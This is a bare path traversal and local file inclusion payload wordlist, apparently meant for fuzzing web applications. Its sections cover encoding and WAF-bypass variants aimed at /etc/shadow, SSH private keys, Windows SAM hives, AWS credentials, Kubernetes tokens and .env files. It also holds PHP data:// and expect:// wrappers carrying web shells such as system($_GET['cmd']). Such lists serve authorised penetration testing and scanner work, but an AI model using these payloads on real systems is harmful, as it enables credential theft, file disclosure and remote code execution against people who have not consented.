# ── Basic Path Traversal (Unix) ──
../etc/passwd
../../etc/passwd
../../../etc/passwd
../../../../etc/passwd
../../../../../etc/passwd
../../../../../../etc/passwd
../../../../../../../etc/passwd
../../../../../../../../etc/passwd
../../../../../../../../../etc/passwd
../../../../../../../../../../etc/passwd
../etc/shadow
../../../etc/shadow
../../../../../etc/shadow
../etc/hosts
../../../etc/hosts
../etc/hostname
../../../etc/hostname
../etc/issue
../../../etc/issue
../etc/motd
../etc/group
../../../etc/group
../etc/resolv.conf
../../../etc/resolv.conf
../etc/nginx/nginx.conf
../../../etc/nginx/nginx.conf
../etc/apache2/apache2.conf
../../../etc/apache2/apache2.conf
../etc/httpd/conf/httpd.conf
../etc/mysql/my.cnf
../../../etc/mysql/my.cnf
../etc/postgresql/pg_hba.conf
../var/log/auth.log
../../../var/log/auth.log
../var/log/syslog
../../../var/log/syslog
../var/log/apache2/access.log
../var/log/apache2/error.log
../var/log/nginx/access.log
../var/log/nginx/error.log
../var/log/httpd/access_log
../var/log/httpd/error_log
../proc/self/environ
../../../proc/self/environ
../proc/self/cmdline
../../../proc/self/cmdline
../proc/self/fd/0
../proc/self/fd/1
../proc/self/fd/2
../proc/self/status
../proc/self/maps
../proc/self/cgroup
../proc/self/mountinfo
../proc/version
../proc/cpuinfo
../proc/net/tcp
../proc/net/arp
../proc/net/route
../proc/1/cmdline
../home/*/.bash_history
../home/*/.ssh/id_rsa
../home/*/.ssh/authorized_keys
../home/*/.ssh/known_hosts
../root/.bash_history
../root/.ssh/id_rsa
../root/.ssh/authorized_keys
../etc/crontab
../etc/cron.d/
../var/spool/cron/crontabs/root

# ── Basic Path Traversal (Windows) ──
..\windows\win.ini
..\..\windows\win.ini
..\..\..\windows\win.ini
..\..\..\..\windows\win.ini
..\..\..\..\..\windows\win.ini
..\..\..\..\..\..\windows\win.ini
..\windows\system.ini
..\..\windows\system.ini
..\..\..\windows\system.ini
..\windows\system32\drivers\etc\hosts
..\..\windows\system32\drivers\etc\hosts
..\..\..\windows\system32\drivers\etc\hosts
..\boot.ini
..\..\boot.ini
..\..\..\boot.ini
..\windows\repair\SAM
..\windows\repair\SYSTEM
..\windows\system32\config\SAM
..\windows\system32\config\SYSTEM
..\windows\debug\NetSetup.log
..\windows\iis.log
..\inetpub\wwwroot\web.config
..\..\inetpub\wwwroot\web.config
..\inetpub\logs\LogFiles
..\windows\php.ini
..\windows\my.ini
..\xampp\apache\conf\httpd.conf
..\xampp\php\php.ini
..\xampp\mysql\bin\my.ini
..\wamp\apache2\conf\httpd.conf
..\wamp\bin\mysql\mysql5.7.26\my.ini

# ── Forward Slash Variants (Windows) ──
../windows/win.ini
../../windows/win.ini
../../../windows/win.ini
../../../../windows/win.ini
../../../../../windows/win.ini
../windows/system.ini
../../windows/system.ini
../windows/system32/drivers/etc/hosts
../../windows/system32/drivers/etc/hosts
../../../windows/system32/drivers/etc/hosts
../boot.ini
../../boot.ini
../../../boot.ini
../inetpub/wwwroot/web.config
../../inetpub/wwwroot/web.config
../windows/repair/SAM
../windows/system32/config/SAM

# ── Null Byte Injection ──
../etc/passwd%00
../../../etc/passwd%00
../../../../../etc/passwd%00
../etc/passwd%00.html
../../../etc/passwd%00.html
../etc/passwd%00.php
../../../etc/passwd%00.php
../etc/passwd%00.jpg
../../../etc/passwd%00.jpg
../etc/passwd%00.txt
../../../etc/passwd%00.txt
../etc/passwd%00.pdf
..\windows\win.ini%00
..\..\..\windows\win.ini%00
..\windows\win.ini%00.html

# ── URL Encoding ──
%2e%2e%2fetc%2fpasswd
%2e%2e%2f%2e%2e%2fetc%2fpasswd
%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd
..%2fetc%2fpasswd
..%2f..%2fetc%2fpasswd
..%2f..%2f..%2fetc%2fpasswd
..%2f..%2f..%2f..%2fetc%2fpasswd
..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
%2e%2e/etc/passwd
%2e%2e/%2e%2e/etc/passwd
%2e%2e/%2e%2e/%2e%2e/etc/passwd
%2e%2e\windows\win.ini
%2e%2e\%2e%2e\windows\win.ini
..%5cwindows%5cwin.ini
..%5c..%5cwindows%5cwin.ini
..%5c..%5c..%5cwindows%5cwin.ini

# ── Double URL Encoding ──
%252e%252e%252fetc%252fpasswd
%252e%252e%252f%252e%252e%252fetc%252fpasswd
%252e%252e%252f%252e%252e%252f%252e%252e%252fetc%252fpasswd
..%252fetc%252fpasswd
..%252f..%252fetc%252fpasswd
..%252f..%252f..%252fetc%252fpasswd

# ── UTF-8 / Unicode Encoding ──
..%c0%afetc%c0%afpasswd
..%c0%af..%c0%afetc%c0%afpasswd
..%c0%af..%c0%af..%c0%afetc%c0%afpasswd
%c0%ae%c0%ae%c0%afetc%c0%afpasswd
%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd
..%ef%bc%8fetc/passwd
..%e0%80%afetc%e0%80%afpasswd
..%c1%1cetc%c1%1cpasswd
..%c1%9cetc%c1%9cpasswd
..%bg%qfetc/passwd
..%25c0%25afetc%25c0%25afpasswd
..%u2215etc%u2215passwd
..%u2216etc%u2216passwd

# ── Filter Bypass / WAF Evasion ──
....//etc/passwd
....//....//etc/passwd
....//....//....//etc/passwd
....//....//....//....//etc/passwd
..../
....\/
..;/etc/passwd
..;/..;/etc/passwd
..;/..;/..;/etc/passwd
..\../etc/passwd
.././../etc/passwd
.././.././../etc/passwd
..\/etc/passwd
..\/..\/etc/passwd
..\/..\/..\/etc/passwd
/./../../etc/passwd
/./../../../etc/passwd
/etc/passwd
/etc/shadow
/etc/hosts
/etc/group
/etc/resolv.conf
/proc/self/environ
/proc/version
/windows/win.ini
/windows/system.ini
/boot.ini
..%00/etc/passwd
..%0d/etc/passwd
..%0a/etc/passwd
..%09/etc/passwd
..%20/etc/passwd
.%2e/etc/passwd
.%2e/.%2e/etc/passwd
.%2e/.%2e/.%2e/etc/passwd
%00../etc/passwd
/%00../%00../etc/passwd
..%5c../etc/passwd
..\\..\\etc\\passwd
..\\..\\..\\etc\\passwd

# ── PHP Wrappers & Filters ──
php://filter/convert.base64-encode/resource=index
php://filter/convert.base64-encode/resource=config
php://filter/convert.base64-encode/resource=../config
php://filter/convert.base64-encode/resource=../../config
php://filter/read=convert.base64-encode/resource=index.php
php://filter/read=convert.base64-encode/resource=config.php
php://filter/read=convert.base64-encode/resource=../config.php
php://filter/read=convert.base64-encode/resource=../../wp-config.php
php://filter/read=string.rot13/resource=index.php
php://filter/read=string.toupper/resource=index.php
php://filter/convert.iconv.utf-8.utf-16/resource=index.php
php://filter/zlib.deflate/convert.base64-encode/resource=index.php
php://filter/convert.base64-encode/resource=/etc/passwd
php://input
php://stdin
php://memory
php://temp
data://text/plain;base64,PD9waHAgc3lzdGVtKCdpZCcpOyA/Pg==
data://text/plain,<?php system('id'); ?>
expect://id
expect://whoami
expect://uname -a

# ── Application-Specific Files ──
../../../var/www/html/index.php
../../../var/www/html/config.php
../../../var/www/html/wp-config.php
../../../var/www/html/.env
../../../var/www/html/application/config/database.php
../../../opt/lampp/etc/httpd.conf
../../../opt/lampp/etc/php.ini
../../../usr/local/etc/php.ini
../../../usr/local/apache2/conf/httpd.conf
../../../usr/local/nginx/conf/nginx.conf
../../../usr/local/tomcat/conf/server.xml
../../../usr/local/tomcat/conf/tomcat-users.xml
../../../usr/local/tomcat/conf/web.xml
/var/www/html/index.php
/var/www/html/config.php
/var/www/html/wp-config.php
/var/www/html/.env
/opt/lampp/etc/httpd.conf
/usr/local/etc/php.ini
/usr/local/etc/nginx/nginx.conf
/usr/local/apache2/conf/httpd.conf
/etc/php/7.4/apache2/php.ini
/etc/php/8.0/apache2/php.ini
/etc/php/8.1/apache2/php.ini
/etc/php/8.2/fpm/php.ini
/etc/ssh/sshd_config
/etc/vsftpd.conf
/etc/proftpd/proftpd.conf
/etc/pure-ftpd/pure-ftpd.conf
/etc/redis/redis.conf
/etc/mongod.conf
/etc/elasticsearch/elasticsearch.yml
/opt/elasticsearch/config/elasticsearch.yml
/etc/kibana/kibana.yml

# ── Log Files ──
/var/log/apache2/access.log
/var/log/apache2/error.log
/var/log/nginx/access.log
/var/log/nginx/error.log
/var/log/httpd/access_log
/var/log/httpd/error_log
/var/log/syslog
/var/log/auth.log
/var/log/messages
/var/log/kern.log
/var/log/dmesg
/var/log/daemon.log
/var/log/mail.log
/var/log/secure
/var/log/faillog
/var/log/lastlog
/var/log/wtmp
/var/log/btmp
/var/log/cron
/var/log/mysql/error.log
/var/log/postgresql/postgresql.log
/var/log/mongodb/mongod.log
/var/log/redis/redis-server.log
/var/log/tomcat/catalina.out
/var/log/php-fpm.log
../../../var/log/apache2/access.log
../../../var/log/apache2/error.log
../../../var/log/nginx/access.log
../../../var/log/nginx/error.log
../../../var/log/syslog
../../../var/log/auth.log

# ── Docker & Container ──
/proc/1/cgroup
/proc/self/cgroup
/.dockerenv
/run/secrets/
../../../.dockerenv
../../../proc/1/cgroup
../../../run/secrets/kubernetes.io/serviceaccount/token
../../../run/secrets/kubernetes.io/serviceaccount/ca.crt
../../../run/secrets/kubernetes.io/serviceaccount/namespace
../../../var/run/secrets/kubernetes.io/serviceaccount/token
/etc/kubernetes/admin.conf
/etc/kubernetes/kubelet.conf
/root/.kube/config
../.kube/config

# ── Cloud Metadata ──
/latest/meta-data/
/latest/meta-data/iam/security-credentials/
/latest/user-data
/metadata/v1/
/metadata/v1/maintenance
/computeMetadata/v1/
/computeMetadata/v1/project/

# ── Deep Traversal (15 levels) ───────────────────────────────────
../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../etc/shadow
../../../../../../../../../../../../etc/shadow

# ── Null Byte Injection ──────────────────────────────────────────
../../../etc/passwd%00
../../../etc/passwd%00.html
../../../etc/passwd%00.php
../../../etc/passwd%00.jpg
../../../etc/passwd%00.pdf
....//....//....//etc/passwd%00
../../../../etc/passwd%00.png

# ── Double Encoding ──────────────────────────────────────────────
..%252f..%252f..%252fetc%252fpasswd
..%255c..%255c..%255cetc%255cpasswd
%252e%252e%252f%252e%252e%252f%252e%252e%252fetc%252fpasswd
..%c0%af..%c0%af..%c0%afetc/passwd
..%ef%bc%8f..%ef%bc%8f..%ef%bc%8fetc/passwd
%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd
%2e%2e/%2e%2e/%2e%2e/etc/passwd

# ── PHP Wrappers ─────────────────────────────────────────────────
php://filter/convert.base64-encode/resource=index.php
php://filter/convert.base64-encode/resource=config.php
php://filter/convert.base64-encode/resource=../config.php
php://filter/convert.base64-encode/resource=../../config.php
php://filter/convert.base64-encode/resource=/etc/passwd
php://filter/read=string.rot13/resource=index.php
php://filter/read=convert.iconv.utf-8.utf-16/resource=index.php
php://filter/zlib.deflate/convert.base64-encode/resource=index.php
php://input
php://stdin
data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7Pz4=
data://text/plain,<?php system($_GET['cmd']);?>
expect://id
expect://whoami
phar://test.phar/test.php
zip://test.zip%23test.php

# ── Windows Targets ──────────────────────────────────────────────
..\..\..\..\windows\win.ini
..\..\..\..\windows\system.ini
..\..\..\..\boot.ini
..\..\..\..\windows\system32\drivers\etc\hosts
..\..\..\..\windows\system32\config\SAM
..\..\..\..\windows\system32\config\SYSTEM
..\..\..\..\windows\system32\config\SECURITY
..\..\..\..\windows\repair\SAM
..\..\..\..\windows\repair\SYSTEM
..\..\..\..\inetpub\wwwroot\web.config
..\..\..\..\inetpub\logs\LogFiles
..\..\..\..\windows\debug\NetSetup.LOG
..\..\..\..\windows\system32\LogFiles\W3SVC1\ex000000.log
C:\windows\win.ini
C:\boot.ini
C:\windows\system32\drivers\etc\hosts

# ── Linux Sensitive Files ────────────────────────────────────────
/etc/passwd
/etc/shadow
/etc/group
/etc/hosts
/etc/hostname
/etc/issue
/etc/motd
/etc/resolv.conf
/etc/crontab
/etc/fstab
/etc/shells
/etc/profile
/etc/bashrc
/etc/sudoers
/etc/ssh/sshd_config
/etc/ssh/ssh_config
/etc/mysql/my.cnf
/etc/postgresql/pg_hba.conf
/etc/nginx/nginx.conf
/etc/nginx/sites-enabled/default
/etc/apache2/apache2.conf
/etc/apache2/sites-enabled/000-default.conf
/etc/httpd/conf/httpd.conf
/etc/redis/redis.conf
/proc/self/environ
/proc/self/cmdline
/proc/self/status
/proc/self/fd/0
/proc/self/fd/1
/proc/self/fd/2
/proc/self/maps
/proc/self/cgroup
/proc/version
/proc/net/tcp
/proc/net/udp
/proc/net/arp
/proc/sched_debug
/var/log/auth.log
/var/log/syslog
/var/log/apache2/access.log
/var/log/apache2/error.log
/var/log/nginx/access.log
/var/log/nginx/error.log
/var/log/httpd/access_log
/var/log/httpd/error_log
/var/log/mysql/error.log
/var/log/postgresql/postgresql.log
/var/log/mail.log
/var/log/lastlog
/var/log/wtmp
/var/log/btmp
/root/.bash_history
/root/.ssh/id_rsa
/root/.ssh/authorized_keys
/root/.ssh/known_hosts
/home/*/.bash_history
/home/*/.ssh/id_rsa
/var/www/html/.env
/var/www/.env
/opt/app/.env
/app/.env
../.env
../../.env

# ── Application Config Files ────────────────────────────────────
/var/www/html/wp-config.php
/var/www/html/config.php
/var/www/html/configuration.php
/var/www/html/.htaccess
/var/www/html/.htpasswd
/var/www/html/database.yml
/var/www/html/settings.py
/var/www/html/config/database.yml
/var/www/html/config/secrets.yml
../wp-config.php
../../wp-config.php
../../../wp-config.php
../config.php
../../config.php
../settings.py
../../settings.py
../.git/config
../../.git/config
../.svn/entries

# ── Path Normalization Bypass ────────────────────────────────────
....//....//....//etc/passwd
....\/....\/....\/etc/passwd
....//../../../etc/passwd
..;/..;/..;/etc/passwd
..\..\..\etc\passwd
..%00/..%00/..%00/etc/passwd
..%01/..%01/..%01/etc/passwd
/%2e%2e/%2e%2e/%2e%2e/etc/passwd
/..%c0%af../..%c0%af../etc/passwd

# ── Java/Tomcat Files ────────────────────────────────────────────
/WEB-INF/web.xml
/WEB-INF/classes/
/WEB-INF/lib/
/META-INF/context.xml
/META-INF/MANIFEST.MF
../WEB-INF/web.xml
../../WEB-INF/web.xml
../../../WEB-INF/web.xml
../../../../WEB-INF/web.xml
/var/lib/tomcat/conf/server.xml
/var/lib/tomcat/conf/tomcat-users.xml
/opt/tomcat/conf/tomcat-users.xml
/usr/share/tomcat/conf/server.xml

# ── Node.js / JavaScript Files ───────────────────────────────────
../package.json
../../package.json
../../../package.json
../.env
../../.env
../../../.env
../config/default.json
../../config/default.json
../config/production.json
../../config/production.json
../node_modules/.package-lock.json
../../node_modules/.package-lock.json
/var/www/html/package.json
/opt/app/package.json
/app/package.json

# ── Python Files ─────────────────────────────────────────────────
../settings.py
../../settings.py
../config.py
../../config.py
../app.py
../../app.py
../.env
../../.env
../requirements.txt
../../requirements.txt
/app/settings.py
/opt/app/settings.py
/var/www/html/settings.py

# ── Docker / Container Files ─────────────────────────────────────
/proc/1/cgroup
/.dockerenv
/proc/self/mountinfo
/proc/self/mounts
/run/secrets/
../docker-compose.yml
../../docker-compose.yml
../Dockerfile
../../Dockerfile

# ── AWS / Cloud Files ────────────────────────────────────────────
~/.aws/credentials
~/.aws/config
/root/.aws/credentials
/root/.aws/config
/home/ec2-user/.aws/credentials
../.aws/credentials
../../.aws/credentials
/var/run/secrets/kubernetes.io/serviceaccount/token
/var/run/secrets/kubernetes.io/serviceaccount/ca.crt
/var/run/secrets/kubernetes.io/serviceaccount/namespace

# ── Git Files ────────────────────────────────────────────────────
../.git/HEAD
../.git/config
../.git/index
../.git/packed-refs
../.git/refs/heads/main
../.git/refs/heads/master
../.git/logs/HEAD
../.git/COMMIT_EDITMSG
../../.git/HEAD
../../.git/config

# ── URL Encoding Variants ───────────────────────────────────────
..%2f..%2f..%2f..%2fetc%2fpasswd
..%5c..%5c..%5c..%5cwindows%5cwin.ini
..%252f..%252f..%252f..%252fetc%252fpasswd
..%255c..%255c..%255c..%255cwindows%255cwin.ini
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows%5cwin.ini
..%c0%af..%c0%af..%c0%af..%c0%afetc%c0%afpasswd
..%c1%9c..%c1%9c..%c1%9c..%c1%9cwindows%c1%9cwin.ini

# ── Path Truncation (PHP < 5.3) ─────────────────────────────────
../../../etc/passwd.......................................................................................................
../../../etc/passwd./././././././././././././././././././././././././././././././././././././
../../../../../../etc/passwd%00index.html

# ── Log Poisoning Targets ───────────────────────────────────────
/var/log/auth.log
/var/log/secure
/var/log/apache/access.log
/var/log/apache/error.log
/var/log/apache2/access.log
/var/log/apache2/error.log
/var/log/nginx/access.log
/var/log/nginx/error.log
/var/log/httpd/access_log
/var/log/httpd/error_log
/var/log/vsftpd.log
/var/log/sshd.log
/var/log/mail
/var/log/exim_mainlog
/var/log/mysqld.log
/var/log/postgresql/postgresql.log
/var/mail/root
/var/spool/cron/crontabs/root
/proc/self/fd/0
/proc/self/fd/1
/proc/self/fd/2
/proc/self/fd/3
/proc/self/fd/4
/proc/self/fd/5
/proc/self/fd/10
/proc/self/fd/15
/proc/self/fd/25

# ── Server-specific Config ──────────────────────────────────────
/etc/nginx/nginx.conf
/etc/nginx/sites-available/default
/etc/nginx/sites-enabled/default
/etc/nginx/conf.d/default.conf
/etc/apache2/apache2.conf
/etc/apache2/ports.conf
/etc/apache2/sites-available/000-default.conf
/etc/httpd/conf/httpd.conf
/etc/httpd/conf.d/ssl.conf
/usr/local/nginx/conf/nginx.conf
/usr/local/apache2/conf/httpd.conf
/usr/local/etc/nginx/nginx.conf
/opt/nginx/conf/nginx.conf
